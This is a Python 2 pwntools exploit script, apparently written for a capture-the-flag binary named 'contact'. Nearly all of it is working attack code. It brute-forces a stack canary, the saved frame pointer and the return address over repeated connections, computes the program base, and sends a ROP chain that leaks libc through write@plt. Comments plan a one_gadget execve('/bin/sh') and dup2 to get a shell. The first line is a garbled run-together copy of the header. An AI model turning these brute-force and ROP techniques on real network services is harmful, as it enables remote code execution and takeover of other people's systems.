#!/usr/bin/env python2# -*- coding: utf-8 -*-from pwn import *from struct

1. #!/usr/bin/env python2
2. # -*- coding: utf-8 -*-
3. from pwn import *
4. from struct import pack
5.  
6. exe = context.binary = ELF('contact')
7. libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
8.  
9. host = args.HOST or '127.0.0.1'
10. port = int(args.PORT or 1337)
11.  
12. def remote(argv=[], *a, **kw):
13. '''Connect to the process on the remote host'''
14. io = connect(host, port)
15. return io
16.  
17. def start(argv=[], *a, **kw):
18. '''Start the exploit against the target.'''
19. return remote(argv, *a, **kw)
20.  
21.  
22. # Bruteforce an 8-byte rbp register
23. def bruteforce(payload):
24. ret = ''
25.  
26. context.log_level = 'error'
27. for b in range(8):
28. for v in range(256):
29. io = start()
30. io.recvline()
31. dummy = ret + chr(v)
32. io.send(payload + dummy)
33.  
34. try:
35. result = io.recvline()
36. ret = dummy
37. print "bytes: " + hex(u64(ret.ljust(8, '\x00')))
38. break
39. except:
40. continue
41. finally:
42. io.close()
43.  
44. context.log_level = 'info'
45. return ret
46.  
47. # Bruteforce an 8-byte canary (technically on 7, because first byte is \x00)
48. def bruteforce_canary(payload):
49. canary = '\x00'
50.  
51. context.log_level = 'error'
52. for b in range(7):
53.  
54. for v in range(256):
55. io = start()
56.  
57. io.recvline()
58.  
59. dummy = canary + chr(v)
60.  
61. # If the byte is correct Done. will be returned
62. io.send(payload + dummy)
63.  
64. try:
65. result = io.recvline()
66. canary = dummy
67. print "canary: " + hex(u64(canary.ljust(8, '\x00')))
68. break
69. except:
70. continue
71. finally:
72. io.close()
73.  
74. context.log_level = 'info'
75.  
76. return canary
77. # Use this one_gadget and not write manual ROP chains
78. # 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
79. # constraints:
80. # rcx == NULL
81.  
82. # -- Exploit goes here --
83.  
84. # Plan of action:
85. # Using fd
86. # First fill stack with stuff up to address 0x38
87. # Bruteforce the 8-byte canary starting with \x00
88. # Bruteforce the 8-byte rbp starting with \x7f (or potentially \x7d or \x7e so bruteforce an extra 2 bits)
89. # Bruteforce the 8-byte return address (according to will should begin with a 55 or 56)
90.  
91. # ROP Chain:
92. # Get .text base by subtracting the return address with its offset in the ELF binary
93. # leak libc using write@plt(4, write@got, 8)
94. # Get libc base by subtracting the offset from write in libc ELF binary
95. # Get dup2's address
96.  
97. payload = fit({}, length=0x38)
98.  
99. # Brute force canary
100. # canary = bruteforce_canary(payload)
101. canary = p64(0x2e51750513e03a00)
102. log.info('final canary: ' + hex(u64(canary)))
103. payload += canary
104.  
105. # Brute force rbp
106. # rbp = bruteforce(payload)
107. rbp = p64(0x7ffd889dae00)
108. log.info('final rbp: ' + hex(u64(rbp)))
109. payload += rbp
110.  
111. # Brute force return address
112. # ret = bruteforce(payload)
113. ret = p64(0x55fdc4aee502)
114. log.info('final ret: ' + hex(u64(ret)))
115.  
116. # Get .text base
117. text_base = u64(ret) - 0x14ee # 14ee is the address of the function that is being returned to
118. exe.address = text_base
119. log.info('.text begins at ' + hex(text_base))
120.  
121. payload += p64(exe.address + 0x00001562) # Jump to finish the vulnerable function
122.  
123. # Leak libc by calling write@plt(4, write@got, 8)
124. rop1 = ROP(exe)
125. rop1.call(exe.plt.write, [4, exe.got.write, 8])
126. log.info('write@plt(4, write@got, 8):\n' + rop1.dump())
127. payload += rop1.chain()
128.  
129. io = start()
130.  
131. io.recvline()
132.  
133. io.send(payload)
134.  
135. io.recvline()
136.  
137. io.interactive()